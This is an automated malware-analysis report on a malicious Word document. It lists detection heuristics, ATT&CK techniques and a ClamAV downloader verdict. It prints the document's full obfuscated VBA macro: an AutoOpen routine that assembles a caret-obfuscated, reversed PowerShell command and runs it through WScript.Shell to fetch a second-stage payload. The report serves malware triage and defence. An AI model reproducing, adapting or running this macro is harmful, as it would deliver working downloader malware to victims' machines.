MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macros are designed to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Valyria-6665593-0' further supports its role as a downloader. The script attempts to construct and execute a command, likely for downloading and executing a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Downloader.Valyria-6665593-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6665593-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 15607 / NzwMs * SquHw * ZEwnp VQwVTCHJuX = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 15607 / NzwMs * SquHw * ZEwnp VQwVTCHJuX = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "WMWslEJoNi" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10727 bytes |
SHA-256: 37ddb8e0337f82b59f831e77eb675d64a8a68dc580b21ce6f435552774061134 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
129 of 214 identifiers look randomly generated (e.g. 'YXKjrzjwwzDo'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YXKjrzjwwzDo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NUADRhErKABjQ"
Function GtNUFzjo()
On Error Resume Next
Error 44305 / WSisZw / 24257 * OOcQc
Error 29367 * 87567 * 57784 * zndLi
Error 23906 * CwUQS / jPiIn / rqmGZ
XipnKZwbhus = "mD /" + "V:^" + "o ^ ^ " + " " + "/R" + Chr(0 + 1 + 3 + 4 + 26) + " ^" + "s^e^T " + "^ ^ ^" + "Qud^b"
Error 1678 * 68716 * 2201 * sXQpG
rPnmcsFS = "=AACAg" + "^AA^I" + "A^ACA" + "g^A^" + "A^I" + "^AACA" + "g^" + "A^AI"
Error arCTkj * KsBwP / 50697 * jfulQA
Error 37159 * BWmCZ * zjUbrT * aAPjWk
Error 41992 / WXUiOG * 56112 * mIfFE
tuSnLuhiL = "^" + "A" + "AC" + "A" + "^g^A" + "A^I^AAC" + "AgA^" + "A^I" + "A^" + "ACAgAQ" + "^fA0^"
Error 89852 / 22074 * 86446 * wpiol
Error 17792 / FfiFkE
WDmzVv = "HA" + "7B^" + "Aa^AMG" + "A^0BQ" + "^Y^A^M" + "GA9^B^" + "w^OAs^" + "GAhBQZ" + "^AI^H^A" + "i" + "Bw^O^A"
Error dSqCzC / lTorNr
Error 82025 * ikTbEQ / 50627 * nUEwo
XjFRBEpPpF = "^I^E^A^" + "w" + "^BgcA^" + "QCAg" + "^AQ" + "bA" + "^U^GA0"
Error wTcFMl * 59161
Error amjXB / soNGVE
Error 72859 / MsjPd
Error 73361 * GRtCD
Error EDRiRZ / jsfGU
RfdoW = "B^Q^S" + "^A0C^A" + "lBw^a" + "A8^GA^2" + "B" + "^g^b^" + "A^kE" + "A7^A^QK" + "AI^E^" + "A^wB^" + "gcA^Q" + "CAgAA^L" + "A^4^"
Error 3800 * cbnZk
Error 84170 * 83001 / 29065 * EBSoVo
Error 12690 / FMNcEu * 14396 / hOOWNz
lntDRiqukW = "E" + "A" + "^Z" + "^Bwc^" + "A^" + "QCA^oA^" + "QZ^A^wG" + "^ApB^g" + "R^A^Q^" + "GAh^B" + "^wb^A^w" + "G^" + "Au^"
Error 4905 / wFmQs / uAmbAi / KBOJc
VOMWJprTVjA = "Bwd" + "A8" + "^G" + "^AE" + "B^g^L^A" + "^gGAk" + "BQ" + "W^A^" + "QC^A"
Error 83205 * XmzMz
Error 47354 / wQaiz
HUhZMqEmsM = "^" + "7BQeAI^" + "HA0" + "^B" + "^w" + "e" + "A^kC^A" + "^" + "k" + "^B" + "w" + "^U^Ao"
Error 33146 / 42662
Error 53989 * NTBsK
zUEjZFJ = "^HAkA^" + "A^I^A4" + "^GApBA" + "^" + "I^A" + "^4^" + "E^"
Error alwqi * hARfBa / 54479 / cjEmM
Error 40260 * 85797
SMKTTPH = "A" + "ZBwcA^Q" + "C" + "Ao^A^A" + "aAMG^" + "AhBQZA" + "IHA" + "vB^" + "gZ^As^" + "D^A" + "n^AQZ" + "Ag^HAl^" + "B^g^L^"
Error 69608 * nDkGBf
Error uNTjv * UszqP
wjaDwLbojVz = "AcCAr^A" + "^Q^b" + "^AEF^A^" + "D^" + "B^A" + "J" + "^AsCAn" + "^A^A^XA" + "cC^Ar^A" + "wYAkG" + "As^B" + "g^Y^A"
GtNUFzjo = XipnKZwbhus + rPnmcsFS + tuSnLuhiL + WDmzVv + XjFRBEpPpF + RfdoW + lntDRiqukW + VOMWJprTVjA + HUhZMqEmsM + zUEjZFJ + SMKTTPH + wjaDwLbojVz
Error 58261 * sPVPQ
Error MjGdr * qcoMtI * 41035 / bBUjuH
Error 94134 * RoYElq / 65408 / NGEIdQ
Error 82860 * ictQU * 67541 / qNSSdb
End Function
Function ZUswQz()
On Error Resume Next
Error qzPnz / 8571
Error sWJRQ * sAuwsJ
qCONCWlWlT = "^U" + "^HAwB" + "g^OA" + "^Y^" + "HAu" + "BQ" + "ZA^QC" + "A^" + "9A^g^QA" + "^A^H" + "^A^y"
Error 55151 / ivLzMd
Error CfjuEO * jlKwj * mNVIs / OvzpaU
Error YPlRww / pIXVOG
Error 92044 / 82176 * 56834 * fTOkKQ
QuBmNdUM = "^B^AJ^A" + "sD" + "An^A^" + "AOA" + "^QD^A^"
Error tcRph / EpGZpN / 70332 / zzzZUM
Error unLzK / auwBGl * tjlut / 31541
Error GlqIB * EjawI
mpbUwK = "3^A^w^" + "J" + "A^AC^A" + "9A^" + "A^" + "IA" + "^0GAR" + "Bw" + "QA^QC^" + "A7A^" + "Q^K^Ac" + "CA^" + "A^Bw^"
Error tIcHV * sbRYV
GsXojJECNk = "J^A" + "^" + "gC^" + "A^0B" + "^Q" + "a^A" + "^w" + "^GA^wB"
Error vUwjnV * fwYno * ZwrFUn / 74187
vcDPKMGqiv = "wUA4C^A" + "n^A" + "^" + "g" + "Z^A^kE" + "AVBw^L" + "A^Q^" + "H" + "^" + "A"
Error 76517 / hRkGCb
Error 93401 / qNffU
Error qOJDUh * SdZSA
MvQXbAXA = "l^B^g" + "b^A4C" + "A^zBgbA" + "8" + "^G^Ap^B" + "AdAUH^" + "As" + "B^w" + "^b^AM^H" + "A^0^B^Q" + "^a^"
Error EXjpaq * KjlqGT / sodsIw * hssJtM
MDDZRwKl = "A^oH" + "A^lBgL^" + "AMG^" + "Au^" + "B^Qa" + "AQHAu" + "BQ^" + "Z"
Error AclkpI / 16919 * qXfqjj * oPhzJU
Error 8284 / OhtkQ
Error 98716 * jlkjiS / 73767 * oAEdS
Error 17143 / VrpTw
zRizGXwbzmk = "^A0" + "G" + "^A0" + "^B" + "w"
Error 35976 / DESFcw / tXFXTm / ozFtkU
Error XluJDc * VKLov * 40245 / HRTbO
mpJfjm = "cA^U^GA" + "^2Bgb" + "AkG^A" + "z^" + "B^Q^" + "Z^A8"
ZUswQz = qCONCWlWlT + QuBmNdUM + mpbUwK + GsXojJECNk + vcDPKMGqiv + MvQXbAXA + MDDZRwKl + zRizGXwbzmk + mpJfjm
Error 90362 / Miiqq
Error 95836 / FtabQ
Error IiQoiY / iYdUV
End Function
Function FjDHIjYf()
On Error Resume Next
Error fTGKAi * LdiKL
TwzobtAD = "CA" + "v" + "^A^g^O" + "A^A^" + "H" + "A^0^B" + "^Ad^Ag" + "^G" + "^A" + "^A^B" + "^w^" + "T^A^8C" + "^A^"
Error DLBwvT / wNCPj / 61212 * QkXmFY
Error 99907 / 96109 * Hucls / 92551
btGRfIBFT = "t^" + "Bw^" + "bAM" + "GA^u" + "A^QYA" + "wG^A^s" + "B^" + "Q" + "^" + "a^AIHA^" + "yB^w^" + "b"
Error 42122 / 24374
Error YfKOak / mXraz
Error 29173 * NtAkOd
kfrwqYvNmjj = "^Ao" + "HA^" + "l^B^gb" + "A^" + "kG" + "^A" + "s^B^QZA"
Error EqnAB / oRjFzs
Error 41351 / HjdEB
Error OGqqWI * cTlEzN * 1902 / ssFBt
Error jAEopt * wKlzsk
Error 7264 / GEoCE
Error 3058 * 41790 / 6276 * LsBMEV
BhljjlfwbN = "^UHA^x^" + "Bw^" + "Y^AE^G" + "^A" + "^qBg^L" + "A8G" + "ApB" + "^AZ^A" + "^E^G^A" + "y^B"
Error 62076 * BJsvv
XjujMCCPJjv = "^Q" + "Y^A^Y" + "H" + "A^" + "p^BA^dA"
Error 26998 / tfhwh / 65242 / 71937
MwsKcEsHTTk = "M" + "GA^1^" + "B^A^" + "ZA" + "8GAy^BA" + "cAI^"
Error 85635 * kdpBh * XviInt / CVzLs
nDiwaf = "H^" + "AlBg" + "^a" + "^A" + "^U" + "HAtB" + "w^L^A8" + "C^A" + "6^A^Ac^" + "A"
Error 38209 / OSkCjF / lOuMk * LkwJw
Error 3353 / HKEivT * 58741 * QZPVR
Error 59822 / DhEQLr
CWbJXszqZE = "Q" + "^HA" + "^0B^" + "A^aA^A" + "EA^a^Bw" + "^M^A" + "I" + "^D^A^" + "j"
Error lJsUai * fzWSmZ / 23143 / QvpbSC
Error GutEo * LUBot / ljlXO / GQJPGE
Error lzdVin * zEBET
Error hnMMz * rooXrh
jCZKAPPbwhY = "B^" + "A" + "MA^A" + "^D^Aa" + "^B^gRA" + "8C^" + "A^yB" + "g^Z^A^" + "4CAl" + "^B" + "Ad" + "AQH^A"
Error hikoO / Muzuzc / tSWAY / LIzZG
Error 64082 * RnnFi
Error OPYFjO / bSuds / 37153 * dOuHv
FzjzX = "lBgbAE^" + "G^" + "A0B" + "AZA^U^" + "HA^hBgY" + "A4C^" + "A" + "2^BA" + "^d^A^Q^" + "H^A^l" + "B^"
Error 93392 * vhVUz
Error 99748 * lRdjaM * 72083 / sEEpR
nBuUPVdKan = "gaA^8^" + "G^A" + "yB" + "AcA" + "8C^Av" + "A^g^" + "O^AA^HA" + "^0B^A" + "^d^A" + "gG^A^A^"
FjDHIjYf = TwzobtAD + btGRfIBFT + kfrwqYvNmjj + BhljjlfwbN + XjujMCCPJjv + MwsKcEsHTTk + nDiwaf + CWbJXszqZE + jCZKAPPbwhY + FzjzX + nBuUPVdKan
Error UivVIF / KOhpO * KQucf / MwnrN
Error 28418 / NJjRTC * ICdvTh / oANKki
Error 64491 / SGjFi
Error 28392 / BVzuuG * ONdSrd / ShEITC
Error 45924 / jrTmk
End Function
Function pTbXPiINQFp()
On Error Resume Next
Error 53686 * DYdkL * 63002 * wYmhcc
Error 65383 * knSSuv / 10407 * oVOZf
sqqETkruPX = "B" + "^Q^Y^A" + "^8C" + "^AyBg" + "^Z^A^4" + "C^A" + "^l^B^A" + "^b^Ak"
Error 60981 * fjOvON / GpZGH / 39069
Error IzjDz / tINdq * MzlZbV / iFLML
Error nGJGo * TSYzC / 16421 / tCTjN
Error EvJaw / HdsLw
uwmHk = "^H^A^" + "0B" + "^" + "wcA^g^" + "H^A" + "^" + "l"
Error swIEF / odSlFN
Error LtvzV * zzuGQ / 4027 / jHXGW
Error 95365 * UZTqOZ * 99114 / 63946
Error TdwIXM / ruoZTf
Error 20372 * bMiWzz / 43927 * qUSVj
icTUOUqjwz = "^" + "B" + "^" + "g^L^AU^" + "G" + "^" + "A^" + "pBgb^" + "Ak^GAnB" + "^gc^A^" + "kG^" + "A2^Bw"
Error TtwfL * znTVqR
Error 49172 / YqUkhX
Error zpRwbl / irdIp
Error 74184 / EubSb
dmTVUKwZ = "^" + "L^A^8CA" + "6^A" + "^AcA" + "^Q^HA" + "^0^BA" + "a^A^A^" + "EAw^Bgc" + "^AIH"
Error 38007 * 16131 / 14485 / VYEpZl
Error 81302 * RnjTrw
Error IklCWL * EBHmKP
Error 11716 / prrRPn
wITRTiRdKAN = "^AvAQY^" + "A" + "^o" + "H^" + "Au^" + "AwbA^M^" + "G^"
pTbXPiINQFp = sqqETkruPX + uwmHk + icTUOUqjwz + dmTVUKwZ + wITRTiRdKAN
Error 41668 / NnzMs
End Function
Function XkEPBK()
On Error Resume Next
Error 61538 / qTuCjH
Error iOWfV / Kzaiv / 76979 * uBmvI
Error 96864 / VizfFk / uCwmpN / FCnKGD
Error dJUYSf / NOjsj * 23619 / jNIiJb
XRLTlP = "Au^" + "A^" + "AaAM^H^" + "AvB^AdA" + "^o" + "^G" + "Ak^B" + "^w^" + "LA8CA6"
Error 64652 * Jhjba
Error kYipM / iBrnk * 26338 / WzPYdF
Error 29127 / XvTYT
Error 89904 / cNVjn
Error IwpTvj * zduQP
Error 41461 * mbDOs
ScTVFB = "AAc^AQ" + "HA^0" + "BA^a^Ac" + "CA9A^AZ" + "A" + "M^FA" + "^6BAJA^" + "s^DA" + "^0B^gb" + "AU^GA^"
Error 34750 * ssdKh * 8861 / OvMGaD
Error wVGil / hiZDls * 87099 * JIPDYv
hvNdPXv = "p^B^A" + "b^A" + "M^E^A^" + "iBQZ" + "A" + "cFA^u" + "^" + "A^A^" + "d"
Error 29963 * cwNijP * iHASXN * jTLOE
wOvbIqlCGzw = "A" + "^UG^AOB" + "^A^I^A" + "^QHAjB" + "^" + "Q^Z^AoG" + "^A" + "^iB^w" + "^bA^0C" + "A^3^" + "BQ^Z"
Error qhmEq * 43579
Error 27520 / uzWFkn / IjQGjr / YTDiza
Error 47081 * sFiFo / 49374 * zKNDl
mumDOwOd = "A^4G^A" + "9^A" + "Aa^A^QG" + "^A^Z^B" + "^AJ ^e"
Error suIQu / rbzTAJ * zZoNsw * phtLVl
Error 21484 / XFOppI / rThTd * 89275
Error VlULAw / IArYEf / zAWOMq * hIzYjU
Error 371 * soTLq
vuuBnXzzmr = "^" + "-^ l^le" + "^hsre^w" + "^op" + "& " + "f" + "^Or /" + "^l %" + "^u ^" + "IN" + " ( ^" + " ^1^0" + "^53 "
Error WHGGw / WSKfb
Error dUmTct * aVQwY
Error 46305 / DDhOpT / jUzKh / cHaJM
Error zQDhK * jzPhw
KfUwR = "^,^ ^ " + "^-" + "1" + ", ^ ^" + " 0) " + "d^O" + " ^sE^" + "t" + " ^Y4^Z" + "=!^Y4^" + "Z" + "!!^Qud^" + "b:~%^u"
XkEPBK = XRLTlP + ScTVFB + hvNdPXv + wOvbIqlCGzw + mumDOwOd + vuuBnXzzmr + KfUwR
Error 3667 * rCitnc
Error USLjw * 26908 * pMWbcW / ifwfi
Error phkVi / ZaGriQ / 28515 * kWMpO
Error JczCu / AiFTS
End Function
Function TjzpqVl()
On Error Resume Next
Error FVZXwV / IojBB / 58963 / bLQSRO
STulNvrBS = ", " + " 1!&&^i" + "^f" + " " + "%^u" + " " + "^" + "l^eQ " + " ^0 C^"
Error 94243 * IqtJj / 80491 / aAscO
Error 21100 * DYwCuO
JjoXm = "a^lL %" + "^" + "Y4" + "^Z:^~" + " " + " -" + "^1" + "0^" + "5^4% "
Error 1401 / BZwsAr
Error 47335 * PIbtZ
Error bBlHN * FVNqH
Error 4461 * vwtOhQ * izBCp / vncfZE
PLihKwEEj = " " + Chr(0 + 1 + 3 + 4 + 26) + ""
TjzpqVl = STulNvrBS + JjoXm + PLihKwEEj
Error 22628 * thlUa * 59358 * kzWQT
Error irirtB / FXiJhl
End Function
Attribute VB_Name = "WMWslEJoNi"
Sub AutoOpen()
On Error Resume Next
Error 15607 / NzwMs * SquHw * ZEwnp
VQwVTCHJuX = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(3 + 9 + 1 + 9 + 45) + LiuKUmwvT + HpcpwtRWXjU + GtNUFzjo + ZUswQz + FjDHIjYf + pTbXPiINQFp + XkEPBK + TjzpqVl + iVbmUjlzbqM + lrFEXWf, 170652707 - 170652707)
Error 82924 / zPCuX
Error 76717 / qBPbwL
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.